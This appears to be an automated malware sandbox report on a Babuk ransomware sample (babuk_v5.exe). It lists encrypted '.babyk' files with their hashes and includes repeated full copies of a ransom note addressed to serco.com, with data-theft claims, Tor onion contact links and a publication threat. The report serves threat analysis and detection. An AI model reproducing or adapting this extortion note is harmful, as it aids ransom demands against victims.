                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_00.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1586
                                                                            Entropy (8bit):7.85714238914523
                                                                            Encrypted:false
                                                                            SSDEEP:48:cyw33BXefUGKbJGirlbKGZNta7WAwkhI9v3KG:cpBpGKbJGirlbKGZNtXXEcKG
                                                                            MD5:098D7FC8D81B1D8E6EF371067A7E326A
                                                                            SHA1:3A24323BF4A519528CC06804DC7A73B811AC1FAA
                                                                            SHA-256:717511052C8F1BF939C306EB96BDF65A3ABA0431DB1F763B0A0F8FF83CF9DCD0
                                                                            SHA-512:A8E2C00E05465A6CD7E367113E15D8BA48CDCC34DBDE526C557D0AAC099E5F99738B43EF87A2F3155178D454F83A6BA0603818D91D4E3C7A10760AA191DCD56B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_01.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):974
                                                                            Entropy (8bit):7.795712942609454
                                                                            Encrypted:false
                                                                            SSDEEP:12:GMX0HJV65sIcQ2COzMQMc6RGvYRh7RriIB8JKLuGGzFlS1B5S50AV/1YEWdpiisZ:x04qQktgGcJiIwKLuGEFc1W3/7qrs7F
                                                                            MD5:2B1BDCD1EFC941B5620F1985E8322A5F
                                                                            SHA1:5D71C7B39760EC8EFA7A5B7792B50C0AC13266F0
                                                                            SHA-256:37BB040759292F4AD11BE8289334A354FFA8EACABC4F0BDE7BF0CFEC2A270A2B
                                                                            SHA-512:CBC87F7CC46A32E46BAF28FD25AEEDAF2BE30AF0A3199D434BD429D701520E3818714F565FCA55F560AD2C2F5CB6D95722E2306B1D74402D6635B332ADD5AB39
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_02.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):872
                                                                            Entropy (8bit):7.762435554512021
                                                                            Encrypted:false
                                                                            SSDEEP:24:f6xFUDYb5GtmdgcVh3DrPAyVza0bBSXcaWY/R:yfU05GmSahtlajFWY/R
                                                                            MD5:3085F4C038C5F4AD57CBC35E9C0F2C8C
                                                                            SHA1:C0858328574CF499156FE99A1985584ECF7BE278
                                                                            SHA-256:1B2FC6BEE13B671F6A32CF70049C511F15E0405EBCC82C9239E27F8127C1AC25
                                                                            SHA-512:136805BD8D04501CDE05237D21E017CFDB6F2EA9FE0C532E7D331AEFE6AC631FA27BB20C82E1B0E6C119E7D7C4EDA4B21F824BD773F630BB9DD66AADA0A790A3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_03.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1064
                                                                            Entropy (8bit):7.798434990300372
                                                                            Encrypted:false
                                                                            SSDEEP:24:f14Tmjwxm/Nl0BTqLHpj+2DbuNVWvKYNLk5o7wv6wy:t4OQpgHpK2HHvKyL8y
                                                                            MD5:D617A4216A91D33A4622D011DFEC3B1B
                                                                            SHA1:F2EB81B743B7379B332A018629AAF421D4E9436A
                                                                            SHA-256:597C56E889D967B686372B2117C8716B8D309E5E8E804CBB314293D0B31520DF
                                                                            SHA-512:AAFF591F2BC1554BA9BDB2F1751A96F7B619E97208BE625543288914172E191F4B4889AFE934538423D0D70D25F655505B7C654B264DDC6B25698BA17B8552E8
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_04.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.794673698485358
                                                                            Encrypted:false
                                                                            SSDEEP:24:OW+C7gQfAfC1GZl023j/nc5n+tGRN2Pd0KJlj/rgQxP:OvCxAfCml02dGsPaKD/0Q9
                                                                            MD5:0FE72FD3E706A0A51D997DD69338FE0C
                                                                            SHA1:E3B5B4AED82890F1E70E4A77090D0155BE32C91F
                                                                            SHA-256:968F4EA72D40C6A365F3B237E8AC78C622DD56EBAD3313B2A33FDF6D1ECFD3C7
                                                                            SHA-512:7F2E0053DE2766BED533E4349DF3AC40D081AA456C9ED86BAF3A74EB90336B16655EE7907C8065885F1829A9747E88C9F92B7F1ED21BFCDC63589C55532BFF24
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_05.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):912
                                                                            Entropy (8bit):7.780805078676036
                                                                            Encrypted:false
                                                                            SSDEEP:24:Uco1gB2qSXz0XuOwZ9A2IwgbYDDHEqrl5wg2s:Fo1E+zkuOs97IwL3Bl5Z
                                                                            MD5:7456233E8BAE710CF438BD679A2E95AB
                                                                            SHA1:D1680DD8E5A9263BB7D1E6FDAA54EFF119505CA4
                                                                            SHA-256:66040CC54F5CCD222024F18EFEB6B10A84AE8BAA1AE37EC146185C4A3FEC2179
                                                                            SHA-512:606CF2CAD76E7D4935B49DB5E66984B1538FE70D9F781AEDBFFDAAE5CFF93C998C9185B2809CD82FC1FE1154981C7DC69DE9557F232DD864D508A21795EF4F5E
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_06.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.727927690899357
                                                                            Encrypted:false
                                                                            SSDEEP:24:2A5uOxyfOgs1tUdfdbXCiZaVEbl7QKgBjEtcu9AUB6s:niGguUNdbXta5Bjs16UBp
                                                                            MD5:92CD4224489008527079159A309205E8
                                                                            SHA1:9AA9409EBADFBE61DDBF706C18EA16A12CEF6994
                                                                            SHA-256:D09FFDDD45B6FBCD50BB76153634D844250847380054C6A5D66FB66130959A60
                                                                            SHA-512:5A4EAED52B176B9F4115849D40F97B696B468633C40CAB88CA0389A5FBB99ADC19816F909AA697105339A795FD973A60FAA34983506998AD841E1533A1902F49
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_07.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):912
                                                                            Entropy (8bit):7.76515306987388
                                                                            Encrypted:false
                                                                            SSDEEP:24:edqFClednCA0o82NDVUq2Wy7X5v5f8seey9nDlBUMYjG50PHs:FF399Vfy1Q1nHUG0PHs
                                                                            MD5:1B0C75C7C3B28537FED3B206311D8DFB
                                                                            SHA1:3B5FAC082C0C617BEA567802BDC53E90B25AAA65
                                                                            SHA-256:161F5D8AEEF390F944B457680E6ACB36AB335DB5AD37932102DC6DE62B9593B7
                                                                            SHA-512:FDAC6487E7D590B63075A66B9B4C38A00BC2B532BF066BB64D9C01FC8291827106E8768586F1F1EA317A5654D423AFCDF3FCE0645297F29E0628C3C3396C40DE
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\_08.sqm.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):934
                                                                            Entropy (8bit):7.764997848746469
                                                                            Encrypted:false
                                                                            SSDEEP:24:+9sZXT2g58TEg/vOZNMWCmC+yshvgewRhHWZnqbZS6:+9qewQvKz3CKhvgLRhH4MZ
                                                                            MD5:8F7EFC6385E0B0283E6B9D2E04A9F2DE
                                                                            SHA1:8259546FA82F908D6E5822186CD614BED25AF8E7
                                                                            SHA-256:873FC2930324B4EA7C7AABA7A44908BBEF262DFE6C92047AA419EC4DAAE855FB
                                                                            SHA-512:023AADC0A5E5DF39969C48245FAAE7530867844C8B925B25CD12B20BB6BA1BBD1138C554DC004C861C8AC6FBDB4BF8BA3FB220E5D1F6561D984B18985930A787
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Live\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\settings.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.017591750004474
                                                                            Encrypted:false
                                                                            SSDEEP:3:4zrHAvSBUs2sgGqrVsH7uxy7Lj1DTWedRcOyMr/vgcV4rfyoepQdxx7hf7oTXBe3:arHAvRsZgDsbNDvJZSCyNlcXoo0vtn
                                                                            MD5:456DB013688DEB55A540B6E70360B37C
                                                                            SHA1:43E722B7CD6CFEFF35B60A9FC585C0E5E0FE9C43
                                                                            SHA-256:2255421235FEB6B42337EBD750F4A108DA1F3B2A287E7EF511287E39CA899B14
                                                                            SHA-512:799FAA52EB2FDFFDC1F69EF0DC7AAC13C30B04A1C2B03486FE1C27FD31F608178019FA76FF8FF3C52A61F2465C59FEE8DBB92991BE6545CC3431C22C99F09EEB
                                                                            Malicious:false
                                                                            Preview: {....zCt..y..L....(.[....g.._..'...h.....dl+O.Nm.m....@^.N...W.....h~9...g..T......S..w....~.WB....>...2..#.YG..DS.iN..................:..%%.......0d!...z.0LY.z...t.."..^.J..n.Ru....=.;...;.]...P...*......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\WindowsApps\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.6062750867769235
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlQIGDsyj7KmlcjIzNBfpKPqjb0V7v0Glpgp0ERpWCK5v/c9UxNvEEn:gIGwyj7K0SIDf7jbs7vpA0ER4CK5v/0I
                                                                            MD5:52B00846C82CFC76ADE8A663479E47D4
                                                                            SHA1:E331AEB178FBB02BB0974B30283CBA729A8B0083
                                                                            SHA-256:1D63E35311DE937770477FCD7EF4EA9FA65FA2550B4F437067C73E8975890DD6
                                                                            SHA-512:EC4E89ED8762DB6D761CF4B6D394F8122306FD7514E060455B3ECC1D680DD5826C1FB2D5C137E3B0CC019CCF3AE8D4CE158610E475D024763FEDAE3B7AF03C34
                                                                            Malicious:false
                                                                            Preview: .....0.p.'kv.c....,.s.,......J{JN...y......!Q..{{......../.YA......X.(p..."i&)#m...n{....G..[z...Z.1W.:........'...P..._....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\ESE\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.542257899264044
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlend/40FxD7H8MqKaHnZAzJiDW4fPLogKxqZjsccg0UxNvEEn:2waxnH8emZnDW43LogGyjscp00vtn
                                                                            MD5:8BDDD3AF755FD5B0040BFCB72C98BC58
                                                                            SHA1:ED382E33FD440A1582C85716ADF3900116862912
                                                                            SHA-256:E796CACFAB300A769E310E69838D0F14C0083DFFFC02C6FE5120121EEBC95425
                                                                            SHA-512:A74D7FAA61093179F45647A54D99691941109244EE1FB687167DDD53A1338962643CA532D889D7E7F5B69F05FA1AD9B409C8801EF7418ABE9334129BE9AFF9E3
                                                                            Malicious:false
                                                                            Preview: .....A.P..e..Vx...._..Z..u\.TT.9\.b...$...........bB.^./.#......,.....3T..Y1....D.....'tfl..IV.....~.....O..W...m.I6.[.7.&..A.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\ESE\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.624843036055279
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlRVo7GRoLenGIbezmJ2KQRv6uCM7C8toEl1A53VUxNvEEn:hhRW4HNJYCuCKlO53V0vtn
                                                                            MD5:7CFB678F9CBDDE3264C858BE3BE078DC
                                                                            SHA1:960D51C1BD7D43C0551FE355FF506D1C7AD4BDC4
                                                                            SHA-256:93F69A99B142C88DB88C033CE157AF96F528D955C5B70C0E9F63058B3F76FAF2
                                                                            SHA-512:1AB616FDCD57F1E0C01AD112E5C19754FAB23074B50916D9616D614B4F8706B30C564A872C43B3F25573FCDAA1F02D17F3F2C9139A14C143151491575AE620ED
                                                                            Malicious:false
                                                                            Preview: ....i. =..p3.[......L..@.k..{...|J.,r.~...s.e........1.......UE...'.L]!.4.b...S.....5R...._L...9..Y..].m|%L...`..T...m.K1..a....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.520867256148369
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlxFD/8wLqDUQZ8X5CMQ1Dkwuo7yGqR/ccaN1Aa6J/5bB4SxTmL9ywNLUxNvEEn:HLWDUQZQvQ1DxrcG1X67jVXwNL0vtn
                                                                            MD5:4FDA75370CAA8DD980A6B8DC90A34CCD
                                                                            SHA1:7F8290807FA581ABFDE85636240C42E969EB9AA3
                                                                            SHA-256:9DDCFEBAA419FCD8AEA88ADA2D3223F06DCDF47E6E5253CFBA6C5EF861278102
                                                                            SHA-512:1CAC87958544598BF4B62D957B8A8CEEBC86E1E673A722D1CCE07EC08757BB1010C0B198CC95E005EDB591F5E82EC68F95A977C79ADBA3A49013A666FE9A89BD
                                                                            Malicious:false
                                                                            Preview: ......}.&Z......D...f.<h.k]...%.n......|.......Sf+n..U.M....OW....y...:..&.%}*..|.<...0..3.vp...z.]F...5.+1.L%._...7X.rN5l........choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):259
                                                                            Entropy (8bit):7.0264585408827385
                                                                            Encrypted:false
                                                                            SSDEEP:6:j0a1Uu8kjqnXaJlMpCwhwDUuRlapXAFhf9uyiYLbH7EwHtL0vtn:n1P84vJWpb2DUpMZHK
                                                                            MD5:9C37DF8386295B63956C30C671A66D46
                                                                            SHA1:A63FD09DE54CD3D91A50A423D3B30A9AAC45A2B2
                                                                            SHA-256:536F669B24ECA1C7BA4E351DC6AE475964BBAD1339AD932CF31F39780FC62717
                                                                            SHA-512:CE49F86D214C88A1115F8341D7D508209CC0034CB288AFEA60AB3BF03CA15F13E9C72561267FEF838DD9B7A8A4B725D4E1689DB73B83775E96332DD803E42DB0
                                                                            Malicious:false
                                                                            Preview: =)P...l(...\... .+.3x.U...;..1.w$'B.._Ek...n ,$.|..:.L......%.V.....y'.v...t..F..30.!......?..B.AAs....8......a.3..K..r......j^j....Q_.x..jQHN.@2.&.5..@..0.#U`..T&A.Q..g.C...N...'=E1c.5=.l.=[$.7..qo:.N.....z.K.n.#~....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\input\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\af-ZA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-AE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-BH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-DZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-EG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-IQ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-JO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-KW\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ar-LB\How To Restore Your Files.txt
